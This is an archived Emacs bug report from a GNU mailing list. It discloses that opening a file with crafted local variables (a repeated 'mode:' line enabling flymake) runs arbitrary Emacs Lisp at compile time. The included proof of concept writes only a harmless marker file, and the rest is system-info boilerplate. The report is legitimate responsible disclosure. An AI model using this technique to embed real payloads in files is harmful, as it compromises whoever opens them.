From: adam plaice <plaice.adam+lists@gmail.com>
To: 37656@debbugs.gnu.org
Subject: bug#37656: 27.0.50; Opening file with specially crafted local variables can cause arbitrary code execution Inbox x
Date: Tue, 8 Oct 2019 10:48:32 +0200 [thread overview]
Message-ID: <CAJw81da4=R1jMJ0enx6SbO7G1rzaL61K2kqbY+jxhe=AM-3vtQ@mail.gmail.com> (raw)
* To reproduce:
1. Create a file, say `~/foobar', (it could have an arbitrary
extension) with the following contents:
-*- mode: emacs-lisp; mode: flymake -*-
(eval-when-compile
(with-temp-file "~/emacs_flymake_security_bug"
(insert "Could have also executed any code.")))
2. Open the file with emacs:
emacs -Q ~/foobar
3. Inspect ~/emacs_flymake_security_bug:
cat ~/emacs_flymake_security_bug
* Expected result
~/emacs_flymake_security_bug does not exist.
* Actual result
~/emacs_flymake_security_bug does exist.
* Further information
This relies on the "deprecated" feature of allowing `mode: ' to be
repeated more than once, to also specify minor modes. Just having:
-*- mode: flymake -*-
in, say, `~/foobar.el' would not trigger the security bug. There may,
however, be alternative ways of triggering it, that I haven't come up
with.
This was "inspired" by a very similar bug (concerning an external
package, editorconfig), described here:
https://illikainen.dev/blog/2019-10-06-editorconfig
Thank you and best regards,
Adam
In GNU Emacs 27.0.50 (build 1, x86_64-pc-linux-gnu, GTK+ Version 3.18.9)
of 2019-10-07 built on adam
Repository revision: 9839466b231b6384055b9b137405730876413cbe
Repository branch: master
Windowing system distributor 'The X.Org Foundation', version 11.0.11804000
System Description: Ubuntu 16.04.6 LTS
Recent messages:
For information about GNU Emacs and the GNU system, type C-h C-a.
Configured using:
'configure --with-modules --without-pop'
Configured features:
XPM JPEG TIFF GIF PNG RSVG SOUND GPM DBUS GSETTINGS GLIB NOTIFY INOTIFY
ACL LIBSELINUX GNUTLS LIBXML2 FREETYPE HARFBUZZ M17N_FLT LIBOTF XFT ZLIB
TOOLKIT_SCROLL_BARS GTK3 X11 XDBE XIM MODULES THREADS PDUMPER LCMS2 GMP
Important settings:
value of $LANG: en_GB.UTF-8
locale-coding-system: utf-8-unix
Major mode: Lisp Interaction
Minor modes in effect:
tooltip-mode: t
global-eldoc-mode: t
eldoc-mode: t
electric-indent-mode: t
mouse-wheel-mode: t
tool-bar-mode: t
menu-bar-mode: t
file-name-shadow-mode: t
global-font-lock-mode: t
font-lock-mode: t
blink-cursor-mode: t
auto-composition-mode: t
auto-encryption-mode: t
auto-compression-mode: t
line-number-mode: t
transient-mark-mode: t
Load-path shadows:
None found.
Features:
(shadow sort mail-extr emacsbug message rmc puny dired dired-loaddefs
format-spec rfc822 mml easymenu mml-sec password-cache epa derived epg
epg-config gnus-util rmail rmail-loaddefs text-property-search time-date
subr-x seq byte-opt gv bytecomp byte-compile cconv mm-decode mm-bodies
mm-encode mail-parse rfc2231 mailabbrev gmm-utils mailheader cl-loaddefs
cl-lib sendmail rfc2047 rfc2045 ietf-drums mm-util mail-prsvr mail-utils
tooltip eldoc electric uniquify ediff-hook vc-hooks lisp-float-type
mwheel term/x-win x-win term/common-win x-dnd tool-bar dnd fontset image
regexp-opt fringe tabulated-list replace newcomment text-mode elisp-mode
lisp-mode prog-mode register page tab-bar menu-bar rfn-eshadow isearch
timer select scroll-bar mouse jit-lock font-lock syntax facemenu
font-core term/tty-colors frame cl-generic cham georgian utf-8-lang
misc-lang vietnamese tibetan thai tai-viet lao korean japanese eucjp-ms
cp51932 hebrew greek romanian slovak czech european ethiopic indian
cyrillic chinese composite charscript charprop case-table epa-hook
jka-cmpr-hook help simple abbrev obarray minibuffer cl-preloaded nadvice
loaddefs button faces cus-face macroexp files text-properties overlay
sha1 md5 base64 format env code-pages mule custom widget
hashtable-print-readable backquote threads dbusbind inotify lcms2
dynamic-setting system-font-setting font-render-setting move-toolbar gtk
x-toolkit x multi-tty make-network-process emacs)
Memory information:
((conses 16 44045 5448)
(symbols 48 5971 1)
(strings 32 15685 1582)
(string-bytes 1 506409)
(vectors 16 9198)
(vector-slots 8 123144 8510)
(floats 8 19 25)
(intervals 56 186 0)
(buffers 1000 11)
(heap 1024 12431 1138))
next reply other threads:[~2019-10-08 8:48 UTC|newest]
Thread overview: 3+ messages / expand[flat|nested] mbox.gz Atom feed top
2019-10-08 8:48 adam plaice [this message]
2019-10-15 21:05 ` bug#37656: 27.0.50; Arbitrary code execution with special `mode:' adam plaice
2019-10-16 13:13 ` bug#37656: 27.0.50; Opening file with specially crafted local variables can cause arbitrary code execution Inbox x Stefan Monnier
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
List information: https://www.gnu.org/software/emacs/
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to='CAJw81da4=R1jMJ0enx6SbO7G1rzaL61K2kqbY+jxhe=AM-3vtQ@mail.gmail.com' \
--to=plaice.adam+lists@gmail.com \
--cc=37656@debbugs.gnu.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
Code repositories for project(s) associated with this public inbox
https://git.savannah.gnu.org/cgit/emacs.git
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).